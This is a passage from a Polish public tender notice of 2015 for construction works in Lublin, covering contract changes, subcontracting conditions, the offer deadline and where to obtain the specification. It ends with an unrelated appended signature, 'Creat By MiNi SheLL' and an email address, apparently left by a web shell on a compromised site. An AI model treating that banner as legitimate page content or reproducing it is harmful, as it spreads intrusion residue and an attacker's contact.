Wnioski o zmianę treści umowy, na skutek okoliczności określonych w pkt.5 Zamawiający lub Wykonawca winien zgłosić drugiej stronie umowy na piśmie w terminie 3 dni od momentu wystąpienia powyższych przesłanek. 7. Zmiana postanowienia umowy dotyczącego osoby na stanowisku kierownika budowy może nastąpić, jeżeli Zamawiający zostanie poinformowany o przyczynach tej zmiany z 3 dniowym wyprzedzeniem. 8. W przypadku zmiany inspektorów nadzoru Zamawiający poinformuje na piśmie o tym fakcie Wykonawcę w terminie 3 dni i wskaże osoby sprawujące z jego strony formalny nadzór inwestorski. Informacja o podwykonawstwie: Wykonawca wskaże w ofercie czy zamierza część zamówienia powierzyć podwykonawcom (nazwy firm i adresy) a jeśli tak, to w jakim zakresie: 1)	Wykonawca nie może zlecić całości robót objętych przedmiotem zamówienia podwykonawcom.
2)	Zlecenie wykonania części robót podwykonawcom nie zmienia zobowiązań Wykonawcy wobec Zamawiającego za wykonanie tej części robót. Wykonawca jest odpowiedzialny za działania, uchybienia i zaniedbania podwykonawców i ich pracowników jak za działania, uchybienia lub zaniedbania własne.
3)	Do zawarcia umowy o roboty budowlane przez Wykonawcę z podwykonawcą wymagana jest zgoda Zamawiającego.
4)	Jeżeli Zamawiający w terminie 14 dni od przedstawienia mu przez Wykonawcę umowy  z podwykonawcą lub jej projektu, wraz z częścią dokumentacji dotyczącą wykonania robót określonych w umowie o podwykonawstwo, nie zgłosi na piśmie sprzeciwu lub zastrzeżeń - uważa się, że wyraził zgodę na zawarcie umowy.
5)	Do zawarcia umowy przez podwykonawcę z dalszym podwykonawcą wymagana jest zgoda Zamawiającego i Wykonawcy. Ustalenia pkt. 2, 3 i 4 stosuje się odpowiednio.
6)	Umowy, o których mowa w pkt. 3 i 5 winny być zawarte w formie pisemnej pod rygorem nieważności.
7)	Odmienne postanowienia umów, o których mowa powyżej, są nieważne.
8)	Zamawiający  nie  wyrazi  zgody  na  zawarcie umowy  z  podwykonawcą,  której  treść będzie sprzeczna z treścią  umowy o wykonanie przedmiotu zamówienia.
9)	W przypadku zawarcia przez Wykonawcę umowy z podwykonawcą lub podwykonawcy z  dalszym podwykonawcą, zmiany lub zatrudnienia nowego podwykonawcy, zmiany warunków umowy z  podwykonawcą  bez zgody  Zamawiającego  oraz  w  przypadku nieuwzględnienia sprzeciwu lub  zastrzeżeń do umowy zgłoszonych przez Zamawiającego zgodnie z ustaleniami  pkt. 4, będą stosowane postanowienia uPzp.
10)	W sytuacji określonej w pkt. 9 Zamawiającemu przysługuje uprawnienie w postaci odmowy podpisania protokołu odbioru  robót  z  tytułu  realizacji  umowy  przez  Wykonawcę do czasu dostosowania warunków umów z podwykonawcami do ustaleń określonych  w niniejszej umowie.
11)	Wykonawca zobowiązany jest dostarczyć  Zamawiającemu  -  najpóźniej  w dniu podpisania protokołu końcowego odbioru robót - pisemnego potwierdzenia przez podwykonawcę  otrzymania zapłaty  należnego wynagrodzenia.  Potwierdzenie winno zawierać zestawienie kwot, które otrzymał  podwykonawca.
12)	W przypadku niedostarczenia potwierdzenia, o którym mowa w pkt. 11, Zamawiający wstrzyma płatność należności Wykonawcy w kwocie odpowiadającej wynagrodzeniu podwykonawcy, do czasu otrzymania tego potwierdzenia.
13)	Do podwykonawstwa stosuje się art. 143b, 143c, 143d ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.znw.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Nieruchomości Wojewódzkich w Lublinie, 20-029 Lublin, ul. Uniwersytecka 4, pok. 106a (pierwsze piętro), tel. 81 532-53-25, 81 532-61-92, 81 743-63-52, fax. 81 532-50-78.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2015 godzina 10:00, miejsce: Zarząd Nieruchomości Wojewódzkich w Lublinie, 20-029 Lublin, ul. Uniwersytecka 4, pok. 106a (pierwsze piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com